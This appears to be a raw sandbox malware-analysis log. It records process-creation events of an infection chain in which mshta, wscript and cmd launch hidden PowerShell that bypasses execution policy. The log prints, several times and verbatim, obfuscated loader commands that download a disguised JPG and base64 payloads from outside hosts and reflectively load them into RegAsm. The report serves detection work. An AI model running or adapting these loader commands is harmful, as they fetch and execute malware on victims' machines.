                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.sder/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdfiawvnn24gicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhreqtvhlqrsagicagicagicagicagicagicagicagicagicagicatbwvtqmvyzevgsw5pvelpbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmtu9ulkrmtcisicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagdkusc3ryaw5nicagicagicagicagicagicagicagicagicagicagihriqm4sc3ryaw5nicagicagicagicagicagicagicagicagicagicagihpdclzdwnrolhvpbnqgicagicagicagicagicagicagicagicagicagicagaktgr1nmd3zhavissw50uhryicagicagicagicagicagicagicagicagicagicagie1uve9xktsnicagicagicagicagicagicagicagicagicagicagic1uqu1ficagicagicagicagicagicagicagicagicagicagicj2uxdrt05jalvjbsigicagicagicagicagicagicagicagicagicagicaglw5btuvzuefjzsagicagicagicagicagicagicagicagicagicagicbnqwcgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakmuhpzu03bjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zlje5my4xntuvegftchavym96l3dly3jlyxrlzgj1dhrlcnntb290agj1dhrlcnroaw5ncy50suyilcikrw52okfquerbvefcd2vjcmvhdgvkynv0dgvyc21vb3roynv0dgvydghpbi52qlmildasmck7u1rbulqtc0xfzxaomyk7c1rhunqgicagicagicagicagicagicagicagicagicagicagiirfbny6qvbqrefuqvx3zwnyzwf0zwridxr0zxjzbw9vdghidxr0zxj0aglulnzcuyi='+[char]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdfiawvnn24gicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhreqtvhlqrsagicagicagicagicagicagicagicagicagicagicatbwvtqmvyzevgsw5pvelpbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmtu9ulkrmtcisicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagdkusc3ryaw5nicagicagicagicagicagicagicagicagicagicagihriqm4sc3ryaw5nicagicagicagicagicagicagicagicagicagicagihpdclzdwnrolhvpbnqgicagicagicagicagicagicagicagicagicagicagaktgr1nmd3zhavissw50uhryicagicagicagicagicagicagicagicagicagicagie1uve9xktsnicagicagicagicagicagicagicagicagicagicagic1uqu1ficagicagicagicagicagicagicagicagicagicagicj2uxdrt05jalvjbsigicagicagicagicagicagicagicagicagicagicaglw5btuvzuefjzsagicagicagicagicagicagicagicagicagicagicbnqwcgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakmuhpzu03bjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zlje5my4xntuvegftchavym96l3dly3jlyxrlzgj1dhrlcnntb290agj1dhrlcnroaw5ncy50suyilcikrw52okfquerbvefcd2vjcmvhdgvkynv0dgvyc21vb3roynv0dgvydghpbi52qlmildasmck7u1rbulqtc0xfzxaomyk7c1rhunqgicagicagicagicagicagicagicagicagicagicagiirfbny6qvbqrefuqvx3zwnyzwf0zwridxr0zxjzbw9vdghidxr0zxj0aglulnzcuyi='+[char]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?eJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.sder/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdfiawvnn24gicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhreqtvhlqrsagicagicagicagicagicagicagicagicagicagicatbwvtqmvyzevgsw5pvelpbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmtu9ulkrmtcisicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagdkusc3ryaw5nicagicagicagicagicagicagicagicagicagicagihriqm4sc3ryaw5nicagicagicagicagicagicagicagicagicagicagihpdclzdwnrolhvpbnqgicagicagicagicagicagicagicagicagicagicagaktgr1nmd3zhavissw50uhryicagicagicagicagicagicagicagicagicagicagie1uve9xktsnicagicagicagicagicagicagicagicagicagicagic1uqu1ficagicagicagicagicagicagicagicagicagicagicj2uxdrt05jalvjbsigicagicagicagicagicagicagicagicagicagicaglw5btuvzuefjzsagicagicagicagicagicagicagicagicagicagicbnqwcgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakmuhpzu03bjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zlje5my4xntuvegftchavym96l3dly3jlyxrlzgj1dhrlcnntb290agj1dhrlcnroaw5ncy50suyilcikrw52okfquerbvefcd2vjcmvhdgvkynv0dgvyc21vb3roynv0dgvydghpbi52qlmildasmck7u1rbulqtc0xfzxaomyk7c1rhunqgicagicagicagicagicagicagicagicagicagicagiirfbny6qvbqrefuqvx3zwnyzwf0zwridxr0zxjzbw9vdghidxr0zxj0aglulnzcuyi='+[char]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdfiawvnn24gicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhreqtvhlqrsagicagicagicagicagicagicagicagicagicagicatbwvtqmvyzevgsw5pvelpbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmtu9ulkrmtcisicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagdkusc3ryaw5nicagicagicagicagicagicagicagicagicagicagihriqm4sc3ryaw5nicagicagicagicagicagicagicagicagicagicagihpdclzdwnrolhvpbnqgicagicagicagicagicagicagicagicagicagicagaktgr1nmd3zhavissw50uhryicagicagicagicagicagicagicagicagicagicagie1uve9xktsnicagicagicagicagicagicagicagicagicagicagic1uqu1ficagicagicagicagicagicagicagicagicagicagicj2uxdrt05jalvjbsigicagicagicagicagicagicagicagicagicagicaglw5btuvzuefjzsagicagicagicagicagicagicagicagicagicagicbnqwcgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakmuhpzu03bjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zlje5my4xntuvegftchavym96l3dly3jlyxrlzgj1dhrlcnntb290agj1dhrlcnroaw5ncy50suyilcikrw52okfquerbvefcd2vjcmvhdgvkynv0dgvyc21vb3roynv0dgvydghpbi52qlmildasmck7u1rbulqtc0xfzxaomyk7c1rhunqgicagicagicagicagicagicagicagicagicagicagiirfbny6qvbqrefuqvx3zwnyzwf0zwridxr0zxjzbw9vdghidxr0zxj0aglulnzcuyi='+[char]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?e
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.sder/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
                  Source: RegAsm.exe, 0000000F.00000002.842095725.0000000000631000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.842261724.0000000000683000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00434CB6 cpuid 28_2_00434CB6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,28_2_0045201B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,28_2_004520B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,28_2_00452143
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,28_2_00452393
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,28_2_00448484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,28_2_004524BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,28_2_004525C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,28_2_00452690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,28_2_0044896D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,28_2_0040F90C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,28_2_00451D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,28_2_00451FD0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
